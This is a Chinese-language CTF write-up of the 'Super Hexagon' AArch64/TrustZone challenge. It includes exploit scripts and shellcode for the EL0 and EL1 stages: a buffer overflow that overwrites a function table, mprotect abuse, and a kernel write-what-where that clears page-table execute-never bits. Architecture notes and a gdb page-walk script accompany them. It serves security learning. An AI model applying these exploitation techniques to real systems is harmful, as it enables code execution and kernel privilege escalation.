最近想深入了解 Arm 架構的 binary 以及相關保護機制如 TrustZone,因此透過打這道 CTF 題目以及看相關文件來了解 Arm 的知識。
- all instructions are fixed to 4-bytes, with the 2-byte Thumb model completely removed
- Exception Levels (EL): EL0, EL1, EL2, EL3
- EL0 - user mode
- EL1 the supervisor
- EL2 typically the hypervisor
- EL3 the trusted firmware or secure monitor (for trustzone)
- Each exception level, except EL2, has a secure or non-secure mode
- controlled by NS bit, change by interrupt (SMC - Secure Monitor Call)
svc- Supervisor Callhvc- Hypervisor Callsmc- Secure Monitor Call
- controlled by NS bit, change by interrupt (SMC - Secure Monitor Call)
README:
Flags have to be read from 8 sysregs: s3_3_c15_c12_0 ~ s3_3_c15_c12_7
For example, in aarch64, you may use:
mrs x0, s3_3_c15_c12_0
mrs x1, s3_3_c15_c12_1
.
.
.
mrs x7, s3_3_c15_c12_7
For first two stages, EL0 and EL1, `print_flag' functions are included.
Make good use of them.
qemu-system-aarch64, based on qemu-3.0.0, is also patched to support this
feature. See `qemu.patch' for more details.
binwalk --dd=".*" ./bios.bin 從 BIOS 當中抽出目標執行檔:
// file
ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, with debug_info, not stripped
// checksec
[*] '/home/u1f383/release/super_hexagon/share/_bios.bin.extracted/chal'
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
打開 IDA 後指令集需選擇 Arm-Little Endian。
run() 的 function 當中使用了 function pointer array 來呼叫 function:
cmdtb[cmd](buf, idx, v0);不過在呼叫 function scanf() 時,會發現內部實作使用了 gets(input),而 input 位於 cmdtb 上方,因此可以透過 input OOB 蓋掉 cmdtb 成 print_flag() 來拿到 flag,exploit 如下:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(print_flag))
r.interactive()要做到 kernel exploit,我們必須要先能執行任意的 shellcode,為此需要透過第一階段的 BOF 使得我們寫入的 data 可以被執行。不過因為 section 的權限保護,因此需要透過 mprotect() 與 mmap() 來改變 section 的保護權限,而 mmap 與 mprotect 皆需透過 svc (Supervisor Call causes an exception to be taken to EL1) instruction 來向 kernel 請求資源。
由於 cmdtb[cmd](buf, idx, v0); 的三個參數剛好都是可以控制的,因此可以用來執行 mprotect():
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
mprotect = 0x401B68
EXEC = 4
WRITE = 2
READ = 1
# mprotect(addr, 0x1000, RWX)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | WRITE | EXEC))
r.interactive()不過因為 ARM 處理器有對 page permission 做 W^X 的保護 (ERROR: [VMM] RWX pages are not allowed ),因此同個 page 不能同時做 execute 與 write,而只需要先寫後再執行就可以繞掉了:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
mprotect = 0x401B68
gets = 0x4019B0
addr = 0x00007ffeffffd000
EXEC = 4
WRITE = 2
READ = 1
input(">")
# gets(addr)
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'0'.ljust(0x100, b'\x00') + p64(gets))
input(">shellcode")
r.sendline(b'\x00'*0x30 + bytes.fromhex('1f2003d51f2003d51f2003d51f2003d5c0035fd6'))
input(">")
# mprotect(addr, 0x1000, R-X)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | EXEC))
# call addr
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(addr + 0x30))
r.interactive()當可以執行任意 shellcode,轉回去分析 bios.bin 以及 qemu 的 match:
// qemu.patch
+static const MemMapEntry memmap[] = {
+ /* Space up to 0x8000000 is reserved for a boot ROM */
+ [VIRT_FLASH] = { 0, 0x08000000 },
+ [VIRT_CPUPERIPHS] = { 0x08000000, 0x00020000 },
+ [VIRT_UART] = { 0x09000000, 0x00001000 },
+ [VIRT_SECURE_MEM] = { 0x0e000000, 0x01000000 },
+ [VIRT_MEM] = { 0x40000000, RAMLIMIT_BYTES },
+};| from | to | |
|---|---|---|
| VIRT_FLASH | 0 | 0x08000000 |
| VIRT_CPUPERIPHS | 0x08000000 | 0x00020000 |
| VIRT_UART | 0x09000000 | 0x00001000 |
| VIRT_SECURE_MEM | 0x0e000000 | 0x01000000 |
| VIRT_MEM | 0x40000000 | RAMLIMIT_BYTES |
丟進 IDA 後選 ARM Little-Endian,並在 0x000000 按 C,告訴 IDA 該處為 code,之後分析 sub_0:
...
_WriteStatusReg(ARM64_SYSREG(3, 6, 1, 0, 0), 0x30C50830ui64);
__isb(0xFu);
_WriteStatusReg(ARM64_SYSREG(3, 6, 12, 0, 0), sub_2000);
__isb(0xFu);
...
memcpy(0xE000000i64, 0x2850i64, 0x68i64);
memcpy(0x40100000i64, 0x10000i64, 0x10000i64); // EL2
memcpy(0xE400000i64, 0x20000i64, 0x90000i64); // SEL1 (I dont know why)
memcpy(0x40000000i64, sub_B0000, 0x10000i64); // EL1
...前面的部分是對 register 做讀寫,對應 register 可以查閱手冊,或是使用 ida-arm-system-highlight 來產生指令詳細操作的 comment,而 AMIE 能縮減 MSR 與 MRS 指令的表示方式,讓逆向的時候更清楚指令使用到哪個 register。
| Level | from | to | |
|---|---|---|---|
| VIRT_FLASH | SEL3 monitor | 0 | 0x08000000 |
| VIRT_CPUPERIPHS | 0x08000000 | 0x00020000 | |
| VIRT_UART | 0x09000000 | 0x00001000 | |
| VIRT_SECURE_MEM | 0x0e000000 | 0x0e400000 | |
| VIRT_SECURE_MEM | SEL1 (32-bit) Trust OS | 0x0e400000 | 0x0e490000 |
| VIRT_SECURE_MEM | 0x0e490000 | 0x01000000 | |
| VIRT_MEM | EL1 kernel | 0x40000000 | 0x40010000 |
| VIRT_MEM | 0x40010000 | 0x40100000 | |
| VIRT_MEM | EL2 hypervisor | 0x40100000 | 0x40110000 |
| VIRT_MEM | 0x40110000 | RAMLIMIT_BYTES |
而後用 dd 將各個 level 的 binary dump 出來:
#!/bin/sh
dd if=bios.bin of=unknown.bin skip=10320 bs=1 count=104
dd if=bios.bin of=el2.bin skip=65536 bs=1 count=65536
dd if=bios.bin of=sel1.bin skip=131072 bs=1 count=589824
dd if=bios.bin of=el1.bin skip=720896 bs=1 count=65536而當前目標是要分析 el1.bin,也就是 OS,將 el1.bin 拖到 IDA 後可以 Edit --> Section --> Rebase Program 到 0xFFFFFFFFC0000000,因為前一階段在執行 keystore 時,當 svc 被呼叫,gdb-multiarch 會跳到 0xFFFFFFFFC0000000 + offset 的位置,因此能知道 kernel 的 base 會是 0xFFFFFFFFC0000000
AArch64 EL1 (secure and non-secure mode) 有兩個 virtual memory mapping
- (D13.2.135) TTBR0 - typically corresponds to user mode processes
- Holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the lower VA range in the EL1&0 translation regime, and other information for this translation regime.
- (D13.2.138) TTBR1 - defines the mappings for the kernel space
- Holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the higher VA range in the EL1&0 stage 1 translation regime, and other information for this translation regime.
- P. 2723 - Figure D5-13 AArch64 TTBRn boundaries and VA ranges for 48-bit VAs
- Memory regions
我們接下來會分析 el1 的 svc handler,因為這是 user mode program 唯一跟 kernel 溝通的方式,不過在分析前,必須對 AArch64 的基本知識有更多認識:
- VBAR - vector 的 base address
- ELR - exception return address
- TTBR - translation table 的 base address
- TCR - 關於 translation table 的 setting
| 異常級別 | TTBR註冊名稱 |
TCR註冊名稱 |
本次有使用 |
|---|---|---|---|
| EL0 | 沒有 | 沒有 | - |
| EL1(用於kernel) | TTBR0_EL1 |
TCR_EL1 |
✔ |
| EL1(用於 user space) | TTBR1_EL1 |
同上 | ✔ |
| EL2(不使用管理程式時) | TTBR0_EL2 |
TCR_EL2 |
✖ |
| EL2(使用管理程式時) | VTTBR_EL2 |
VTCR_EL2 |
✔ |
| S-EL3 | TTBR0_EL3 |
TCR_EL3 |
✔ |
- 當啟用分頁的 CPU 通過 VA 接收 memory access 時,它會參考適當的頁表並執行 page traverse(VA --> PA)
- Page walking 是一項開銷很大的操作,因為它需要多個 page reference 來將 VA 解析為 PA,這就是 CPU
TLB稱為 (Translation Lookaside Buffer) 的 translation cache 的原因,AArch64 也是這種情況
- Page walking 是一項開銷很大的操作,因為它需要多個 page reference 來將 VA 解析為 PA,這就是 CPU
- AArch64 中除了 EL0,每個異常級別 (EL) 都有一個或多個 translation table register,意味著可能存在一個(
EL1、EL2、S-EL3)不同的 virtual memory space,對於此題目也是一樣- 在 S-EL3 中,
TTBR0_EL3並在啟動時TCR_EL3初始化 - 在 EL2 中,
VTTBR_EL2並被VTCR_EL2初始化 - 在 EL1 中,
TTBR0_EL0(for user space)和TTBR1_EL1(for kernel)TCR_EL1被初始化。
- 在 S-EL3 中,
- 每個 register 具有以下功能:
TTBR- 特定的 EL 的 page table 的 physical base address- Translation Table Base Register
VTTBR- page table 的 physical base address,以便在使用管理 process 時使用- 與 TTBR 重複功能?
- Virtualization Translation Table Base Register
TCR- 用於更改 page table 的資訊,例如 page granularityTG0=4KB,16KB,64KB和 VA space range (T0SZ)- Translation Control Register
- 實際的頁表結構是一個多級樹結構,其中描述了頁權限並最終轉換為物理地址值。
執行過程中各個 register 的值:
- EL1
- TTBR0_EL1 - 0x20000
- TTBR1_EL1 - 0x1b000
- TCR_EL1 - 0x6080100010
- EL2
- TTBR0_EL2 - 0x0
- TCR_EL2 - 0x0
- VTTBR_EL2 - 0x40106000
- VTCR_EL2 - 0x80000027
- EL3
- TTBR0_EL3 - 0xe203000
- TCR_EL3 - 0x100022
因為 svc 屬於 synchronous exception,加上 arch 又是 AArch64,因此會執行 VBAR_EL1 + 0x400 的 exception handler
P.S. 這邊發現 gdb 當中沒辦法印出 VBAR_EL1,反而 VBAR 能夠印出正確的位置 (0xffffffffc000a000)
-
EL VBAR註冊名稱題目需要 EL0 沒有任何 - EL1 VBAR✔ EL2 VBAR_EL2✔ S-EL3 VBAR_EL3✔ -
When high exception vectors are not selected, holds the vector base address for exceptions that are not taken to Monitor mode or to Hyp mode
-
Software must program VBAR(NS) with the required initial value as part of the PE boot sequence
所以 0xffffffffc000a000 + 0x400 會跳轉到 sync_interrupt_handler:
ROM:FFFFFFFFC000A400 ; ---------------------------------------------------------------------------
ROM:FFFFFFFFC000A400 STR X30, [SP,#0xF0]
ROM:FFFFFFFFC000A404 B sync_interrupt_handler
ROM:FFFFFFFFC000A404 ; ---------------------------------------------------------------------------
ROM:FFFFFFFFC000A408 ALIGN 0x80
ROM:FFFFFFFFC000A480 DCB 0x20P.S. 因為 exception vector 的 size 是 0x80,因此在使用 IDA 時,可以在後方按 l 調整 align 成 0x80
ROM:FFFFFFFFC000A80C sync_interrupt_handler ; CODE XREF: ROM:FFFFFFFFC000A404↑j
ROM:FFFFFFFFC000A80C
ROM:FFFFFFFFC000A80C arg_110 = 0x110
ROM:FFFFFFFFC000A80C arg_170 = 0x170
ROM:FFFFFFFFC000A80C
ROM:FFFFFFFFC000A80C BL save_context
ROM:FFFFFFFFC000A810 MRS X0, TTBR0_EL1 ; [<] TTBR0_EL1 (Translation Table Base Register 0 (EL1))
ROM:FFFFFFFFC000A814 STR X0, [SP,#arg_170]
ROM:FFFFFFFFC000A818 MOV X6, SP
ROM:FFFFFFFFC000A81C LDR X12, [SP,#arg_110]
ROM:FFFFFFFFC000A820 MSR SPSel, #0 ; Select PSTATE.SP = SP_EL0
ROM:FFFFFFFFC000A824 MOV SP, X12
ROM:FFFFFFFFC000A828 MOV X0, X6
ROM:FFFFFFFFC000A82C BL handle_syscall
ROM:FFFFFFFFC000A830 BL transition_umsave_context將當前的 register 存入 EL0 的 stack 當中- 逆
handle_syscall時可以參考 https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#arm64-64_bit
handle_syscall 在執行 read syscall 時並沒有檢查 address 是否 destination 在 user space 當中,因此可以蓋到 kernel space 的內容:
__int64 __fastcall handle_syscall(unsigned __int64 *param)
{
...
if ( _ReadStatusReg(ESR_EL1) >> 26 != 21 )
cpuidle();
x0 = *param;
x1 = param[1];
x2 = param[2];
x3 = param[3];
syscall_NR = param[8];
switch ( syscall_NR )
{
case _NR_SYSCALL_READ:
if ( x2 )
{
syscall_NR = read_one_byte();
if ( (syscall_NR & 0x80000000) != 0 )
{
x2 = -1i64;
}
else
{
*x1 = syscall_NR; // overwrite one byte
x2 = 1i64;
}
}
break;
...- 由於可以透過
syscall_read寫 kernel space,因此我們有 kernel-level write-what-where primitive - 不過其他 function 看似也沒有做 address check
攻擊方法為:
-
透過
read()沒有做 address check 來寫print_el1_flag的 address 在 stack 後方 -
完成後再透過 overwrite 1 byte + gadget,控制
pc到print_el1_flag,而 gadget 要選可以控制X29後接RET的,並且 return address 只有一個 byte 可以調整-
ROM:FFFFFFFFC0009430 LDP X19, X20, [SP,#var_s10] ROM:FFFFFFFFC0009434 LDP X29, X30, [SP+var_s0],#0x20
-
用 IDA search text
ffffffffc000[0-9A-F]{2}30來找
-
AArch64 用來寫入 print_el1_flag 位址與 return address 的 shellcode:
.section .text
.global _start
_start:
LDR X10, =0xffffffffc0019c00
MOV X9, #0
.loop:
MOV X0, #0
ADD X1, X10, X9
MOV W2, #1
MOV X8, #0x3f
SVC 0 // read(0, buffer=target, n=1)
ADD X9, X9, #1
MOV X11, #0x10 // do 0x10 time
CMP X9, X11
B.MI .loop
# overwrite return gadget
# and return to print_el1_flag
LDR X10, =0xffffffffc0019bb8+1
NOP
MOV X0, #0
ADD X1, X10, #0
MOV W2, #1
MOV X8, #0x3f
SVC 0
# compile: aarch64-linux-gnu-as ./sc.s
# check: aarch64-linux-gnu-objdump -d ./a.out
# extract .text: aarch64-linux-gnu-objcopy -I elf64-littleaarch64 -j .text -O binary ./a.out ./output最終 EL1 的 exploit 如下:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
print_el1_flag = 0xFFFFFFFFC0008408
mprotect = 0x401B68
gets = 0x4019B0
addr = 0x00007ffeffffd000
EXEC = 4
WRITE = 2
READ = 1
input(">")
# gets(addr)
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'0'.ljust(0x100, b'\x00') + p64(gets))
sc = open('./output', 'rb').read()
r.sendline(b'\x00'*0x30 + sc)
# mprotect(addr, 0x1000, R-X)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | EXEC))
# call addr
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(addr + 0x30))
input('>')
r.send(b'A'*8 + p64(print_el1_flag))
input('> ')
r.send(b'\x94')
r.interactive()為了要做到 EL1 任意執行 shellcode,需要做下一步的準備。以下為 EL1 在使用 TTBR 的情況,當 address prefix 為 kernel mode 使用 TTBR1_EL1,當 address prefix 為 user mode 時使用 TTBR0_EL1:
而 TCR_EL1 的 T0SZ 與 T1SZ 是控制 range of address translation:
page walk — a translation from a virtual to a physical address
- 代價很高 (multiple lookups required to resolve a VA to PA)
- processors 用 translation cache called the Translation Lookaside Buffer (TLB) 來增加速度,AArch64 也使用相同的硬體機制
- Each Exception Level in AArch64, except for EL0 has one or more translation table registers
- This means there can be at least three different virtual memory spaces (EL1, EL2, EL3)
- 開機 (boot) 時:
- EL3 -->
TTBR0_EL3andTCR_EL3 - EL2 -->
VTTBR_EL2andVTCR_EL2 - EL1 -->
TTBR0_EL1(user) andTTBR1_EL1()
- EL3 -->
EL0 shellcode,會做以下的事情:
mmap()分配給 el1 執行的 shellcode region- 先用 RW
- 寫完 shellcode 改成 RX
- 透過 pagewalk 找到描述該 VA 的 page entry,蓋掉 PXN 與 UXN (寫成 0x00)
- 分配一個新的 memory region flush TLB,避免 cache 住 page 的 upper attributes
- 在
syscall_handler的 return 後方 + 0x30 處寫 el1 shellcode address- el1 shellcode address 會用 python script 傳入
- 透過將 return address overwrite 1 byte 成
FFFFFFFFC0009430,最終跳到我們寫的 el1 shellcode
.section .text
.global _start
_start:
// mmap(0, 0x1000, 3, 0, 0, -1)
MOV X0, XZR // XZR is zero register
MOV X1, #0x1000 // len=0x1000
MOV W2, #3 // prot=rw
MOV W3, #0 // fd=0
MOV W4, #0 // flags=0
MOV X5, #-1 // offset=-1
MOV X8, #0xde
SVC 0
// will return 0x7ffeffffc000
// pagewalk output: [last] ffffffffc0028fe0 -> 00007ffeffffc000: 0x0000000000035000 [PXN UXN ELx/RW]
// X22 is shellcode page
MOV X22, X0
// gets(mmap_buffer) to read shellcode
MOV X0, X22
LDR X8, =0x4019B0
BLR X8
// change prot of mmap_buffer
// mprotect(mmap_buffer, 0x1000, 5)
MOV X0, X22
MOV X1, #0x1000
MOV W2, #5 // rx
MOV X8, #0xe2
SVC 0
LDR X12, =0xffffffffc0028fe0
MOV X0, XZR
ADD X1, X12, #6 // overwrite [54:53]
MOV W2, #1
MOV X8, #0x3f
SVC 0
// after: [last] ffffffffc0028fe0 -> 00007ffeffffc000: 0x0000000000035000 [ELx/R]
// we need to mmap a new memory to flush TLB
MOV X0, XZR // XZR is zero register
MOV X1, #0x1000 // len=0x1000
MOV W2, #3 // prot=rw
MOV W3, #0 // fd=0
MOV W4, #0 // flags=0
MOV X5, #-1 // offset=-1
MOV X8, #0xde
SVC 0
// write ROP
LDR X10, =0xffffffffc0019c00
MOV X9, #0
.loop:
MOV X0, #0
ADD X1, X10, X9
MOV W2, #1
MOV X8, #0x3f
SVC 0 // read(0, buffer=target, n=1)
ADD X9, X9, #1
MOV X11, #0x10 // do 0x10 time
CMP X9, X11
B.MI .loop
# overwrite return gadget
# and return to print_el1_flag
LDR X10, =0xffffffffc0019bb8+1
NOP
MOV X0, #0
ADD X1, X10, #0
MOV W2, #1
MOV X8, #0x3f
SVC 0EL1 shellcode,目標是執行 print_flag():
.section .text
.global _start
_start:
LDR x8, =0xFFFFFFFFC0008408
BLR X8
NOPpython script:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
mprotect = 0x401B68
gets = 0x4019B0
addr = 0x00007ffeffffd000 # el0 shellcode address
shellcode = 0x7ffeffffc000 # el1 shellcode address
EXEC = 4
WRITE = 2
READ = 1
input(">")
# gets(addr)
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'0'.ljust(0x100, b'\x00') + p64(gets))
sc = open('./el0', 'rb').read()
r.sendline(b'\x00'*0x30 + sc)
# mprotect(addr, 0x1000, R-X)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | EXEC))
# call addr
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(addr + 0x30))
input('>')
el1_sc = open('./el1', 'rb').read()
r.sendline(el1_sc)
input('>')
r.send(b'\x00')
input('> write ROP')
r.send(b'A'*8 + p64(shellcode))
input('> write ret')
r.send(b'\x94')
r.interactive()稍微修改了 aarch64-pagewalk.py,用自己較好理解的方式將資料印出:
import gdb
import math
KERNEL_BASE = 0xffffffffc0000000
class Pagewalk(gdb.Command):
def __init__(self):
self.CPSR_Mbit = {
0b00: "User",
0b01: "Kernel",
0b10: "Hypervisor",
0b11: "Monitor"
}
super(Pagewalk, self).__init__("pagewalk", gdb.COMMAND_DATA)
def loadq(self, addr):
v = gdb.parse_and_eval('*(unsigned long long*)(%s)' % addr)
return int(v)
# Upper attributes + Lower attributes parsing
def format_ent(self, ent, S2):
flags = []
phy = ent & 0xfffffffff000
# stage 2
# intermediate phy addr space --> PA
if S2:
XN = (ent >> 53) & 0b11
# S2AP = Stage 2 data Access Permissions bits
S2AP = (ent >> 6) & 0b11
# A = Access flag
A = (ent >> 10) & 0b1
if XN == 0:
pass
elif XN == 1:
flags += ['PXN']
elif XN == 2:
flags += ['UXN', 'PXN']
elif XN == 3:
flags += ['UXN']
if not A:
flags += ['!ACC']
if S2AP == 0:
flags += ['ELx/NONE']
elif S2AP == 1:
flags += ['ELx/R']
elif S2AP == 2:
flags += ['ELx/W']
elif S2AP == 3:
flags += ['ELx/RW']
# stage 1
# VA --> intermediate phy addr space
else:
XN = (ent >> 53) & 0b11
AP = (ent >> 6) & 0b11
NS = (ent >> 5) & 0b1
A = (ent >> 10) & 0b1
if XN & 1:
flags += ['PXN']
if XN & 2:
flags += ['UXN']
if NS:
flags += ['NS']
if not A:
flags += ['!ACC']
if AP == 0:
flags += ['EL1/RW']
elif AP == 1:
flags += ['ELx/RW']
elif AP == 2:
flags += ['EL1/R']
elif AP == 3:
flags += ['ELx/R']
flags = " ".join(flags)
return "0x%016lx [%s]" % (phy, flags)
# pt_pa: page table physical address
# pt_va: page table virtual address
def print_table(self, pt_pa, granule_bits, region_sz,
pt_va_base=0, upper_region=False):
# We assume the PA range is 47:0 (48-bits)
ent_num_bits = granule_bits - 3 # each ent is 8 bytes (2**3)
# 2**(ent_num_bits) ent
# 2**3 per ent
# 2**(3 + ent_num_bits) == 2**granule_bits == size per table
ent_per_table = 2**(ent_num_bits)
# round up to nearest level
print("Calculate level: \t(%d - %d - %d) / %d"
% (64, region_sz, granule_bits, ent_num_bits))
levels = int(math.ceil((64.0 - region_sz - granule_bits) / ent_num_bits))
print("Entries/table: \t%d" % ent_per_table)
print("Levels: \t%d" % levels)
# table addresses are physical. From the perspective of GDB
# and depending on if the MMU is enabled, we need to find the
# corresponding virtual address for the page tables
tables = [[0, pt_pa]]
next_tables = []
if upper_region:
tables[0][0] = 0xffff000000000000
# stage 2 == el2 ?
isS2 = self.CurrentEL == 2
for level in range(levels):
if len(tables) == 0:
break
# D5-2740
# With the 4KB granule size, for the level 1 descriptor n is 30
# and for the level 2 descriptor, n is 21
# 39 / 30 / 21 / 12
# a indexed by [n:39]
# b indexed by [38:30]
# c indexed by [29:21]
# d indexed by [20:12]
x = levels - (level+1) + 3 # 6, 5, 4, 3
rbit = granule_bits + (x-3)*ent_num_bits
last_level = (level+1) == levels
print("granule_bits: %d" % granule_bits)
print("ent_num_bits: %d" % ent_num_bits)
print("rbit: %d" % rbit)
print("---- Level %d ----" % level)
for va, table_addr in tables:
print("va: %016lx\ntable_addr: %016lx" % (va, table_addr))
for ent_no in range(ent_per_table):
ent = self.loadq(pt_va_base + table_addr + ent_no*8)
# new_va == va_base + (idx of entry * table_size)
new_va = va | (ent_no << rbit)
# D5-2740
# table type entry
if (ent & 0b11) == 0b11:
if last_level:
print("[last] %016lx -> %016lx: %s" % (pt_va_base + table_addr + ent_no*8, new_va, self.format_ent(ent, isS2)))
# last level mapping
else:
print("[table] %016lx == %016lx | (%016lx << %d)" % (new_va, va, ent_no, rbit))
# last 12 bits is ignore + type
# ent & 0xfffffffff000 is the next-level table address
next_tables += [[new_va, (ent & 0xfffffff000)]]
# block type entry
elif (ent & 0b11) == 0b01:
print("[block] %016lx: %s" % (new_va, self.format_ent(ent, isS2)))
tables = next_tables
next_tables = []
def invoke(self, arg, from_tty):
argv = list(filter(lambda x: x.strip() != "", arg.split(" ")))
argc = len(argv)
SAVED_CPSR = 0
# G8.2.33 CPSR, Current Program Status Register
CPSR = int(gdb.parse_and_eval("$cpsr")) & 0xffffffff
# M, bits [3:0] = Current PE mode
self.CurrentEL = int(CPSR & 0b1100) >> 2
if argc >= 1:
try:
target_el = int(argv[0])
if target_el < 1 or target_el > 3:
print("Invalid argument (ELx >= 1 && ELx <= 3")
return
if target_el != self.CurrentEL:
SAVED_CPSR = CPSR
CPSR = CPSR & (0b0011)
CPSR |= target_el << 2
gdb.parse_and_eval('$cpsr = 0x%08x' % CPSR)
print("Moving to EL%d (%s)" % (target_el,
self.CPSR_Mbit[target_el]))
except ValueError:
print("Invalid argument (ELx integer required)")
pass
CPSR = int(gdb.parse_and_eval("$cpsr")) & 0xffffffff
self.CurrentEL = int(CPSR & 0b1100) >> 2
print("CPSR: EL%d (%s)" % (self.CurrentEL, self.CPSR_Mbit[target_el]))
print("EL%d (%s)" % (self.CurrentEL, self.CPSR_Mbit[self.CurrentEL]))
try:
if self.CurrentEL == 0:
print("No paging in EL0")
elif self.CurrentEL == 1:
TTBR0_EL1 = int(gdb.parse_and_eval('$TTBR0_EL1'))
TTBR1_EL1 = int(gdb.parse_and_eval('$TTBR1_EL1'))
# D13.2.123 TCR_EL1, Translation Control Register
# [15:0] - for usermode
# [31:16] - for kernel
TCR_EL1 = int(gdb.parse_and_eval('$TCR_EL1'))
# translation 0/1 region size (user mode/kernel)
# T0SZ/T1SZ, bits [5:0]/[21:16] = The size offset of the memory region
# addressed by TTBR0_EL1/TTBR1_EL1
T0SZ = TCR_EL1 & 0b111111
T1SZ = (TCR_EL1 >> 16) & 0b111111
# Granule size for TTBR0_EL1/TTBR1_EL1
# I think granule size is table size
TG0 = (TCR_EL1 >> 14) & 0b11
TG1 = (TCR_EL1 >> 30) & 0b11
# IPS, bits [34:32] = Intermediate Physical Address Size
# 0 -> 32, 1 -> 36, 2 -> 40, etc.
IPS = (TCR_EL1 >> 32) & 0xb111
print("IPA Size: %d-bits" % (32 + 4*IPS))
if TG0 == 0b00:
TG0_BITS = 12 # 4KB
elif TG0 == 0b01:
TG0_BITS = 16 # 64KB
elif TG0 == 0b10:
TG0_BITS = 14 # 16KB
else:
print("TG0 reserved")
if TG1 == 0b01:
TG1_BITS = 14 # 16KB
elif TG1 == 0b10:
TG1_BITS = 12 # 4KB
elif TG1 == 0b11:
TG1_BITS = 16 # 64KB
else:
print("TG1 reserved")
print("EL1 kernel region min: \t0x%016lx" % (2**64 - 2**(64-T1SZ)))
print("EL1 user region max: \t0x%016lx" % (2**(64-T0SZ) - 1))
print("EL1 kernel page size: \t%dKB" % (2**TG1_BITS >> 10)) # / 1024
print("EL1 user page size: \t%dKB" % (2**TG0_BITS >> 10)) # / 1024
print("-------- User mode page table --------")
self.print_table(TTBR0_EL1, TG0_BITS, T0SZ, pt_va_base=KERNEL_BASE)
print()
print("-------- Kernel mode page table --------")
self.print_table(TTBR1_EL1, TG1_BITS, T1SZ, pt_va_base=KERNEL_BASE, upper_region=True)
print()
except:
pass
Pagewalk()
# source ./pagewalk.py
# gdb> pagewalk
# gdb> pagewalk 1Others
wfi- 會讓 CPU 進入 idleSTP- store pair- AArch64 - X30 為 link register (放 return address)
- Arm 用 LR
The Armv8-A architecture defines a set of Exception levels, EL0 to EL3, where
- If ELn is the Exception level, increased values of n indicate increased software execution privilege
- Execution at EL0 is called unprivileged execution
- EL2 provides support for virtualization
- EL3 provides support for switching between two Security states, Secure state and Non-secure state
state
- Secure state
- When in this state, the PE can access both the Secure physical address space and the Non-secure physical address space
- Non-secure state
- When in this state, the PE can access only the Non-secure physical address space
- Cannot access the Secure system control resources.
EL2
- provides a set of features that support virtualizing an Armv8-A implementation
- The basic model of a virtualized system involves:
- A hypervisor, running in EL2, that is responsible for switching between virtual machines
- A virtual machine comprises EL1 and EL0
- A number of Guest operating systems
- A Guest OS runs on a virtual machine in EL1
- For each Guest operating system, applications, that run on the virtual machine of that Guest OS, usually in EL0
- A hypervisor, running in EL2, that is responsible for switching between virtual machines
- need to implement all of the virtual interrupts:
- Virtual SError
- Virtual IRQ
- Virtual FIQ
Registers for instruction processing and exception handling (D1.6)
- general-purpose registers, R0-R30 (64-bit 為 X0-X30, 32-bit 為 W0-W30)
- X0 ~ X7 用於傳遞參數 / 執行結果
- SP (x31), PC 等等
- Exception Link Registers (ELRs)
- hold preferred exception return addresses
- Saved Program Status Registers (SPSRs)
- used to save PE state on taking exceptions
- SPSR_EL1, for exceptions taken to EL1 using AArch64
- If EL2 is implemented, SPSR_EL2, for exceptions taken to EL2 using AArch64
- If EL3 is implemented, SPSR_EL3, for exceptions taken to EL3 using AArch64
- When the PE takes an exception, the PE state is saved from PSTATE in the SPSR at the Exception level the exception is taken to
D1.7 Process state (PSTATE)
- In the Armv8-A architecture, Process state or PSTATE is an abstraction of process state information
- All of the instruction sets provide instructions that operate on elements of PSTATE
D1.10 Exception entry
- ELR_ELx
- For an exception taken to an Exception level using AArch64, the Exception Link Register for that Exception level, ELR_ELx, holds the preferred exception return address
- 每個 EL 會有對應的 Vector Base Address Register (VBAR),裡面存 exception base address for the table

-
- Asynchronous exceptions
- IRQ
- FIQ
- SError (System Error)
- Synchronous exceptions
- register about exception
ESR_ELn- gives information about the reasons for the exceptionFAR_ELn- holds the faulting virtual address for all synchronous instruction and Data Aborts and alignment faultsELR_ELn- holds the address of the instruction that caused the aborting data access (for Data Aborts)
- svc / hvc / smc
TTBR_ELx
- D5.3.1 VMSAv8-64 translation table level -1, level 0, level 1, and level 2 descriptor formats
- D5.3.2 Armv8 translation table level 3 descriptor formats
皆是由末 2 bit 來決定 page type:
- Invalid - 0b0
- D_Block - 0b11
- D_Table - 0b11
- D_Page - 0b01
P. 2749
- upper
PBHA: Page-based Hardware Attributes bits- These bits are IGNORED when FEAT_HPDS2 is not implemented
UXN: 執行權限。表示 EL0 page 是否可以在同一個 EL 中執行,即 EL0- The Execute-never or Unprivileged execute-never field
PXN: 執行權限。表示 EL0 page 是否可以在上層 EL,即 EL1 中執行- The Privileged execute-never field
Contiguous: 指示它是連續頁面之一的提示- a hint bit indicating that the translation table entry is one of a contiguous set of entries
DBM: Dirty Bit ModifierGP: Guarded Page
- lower
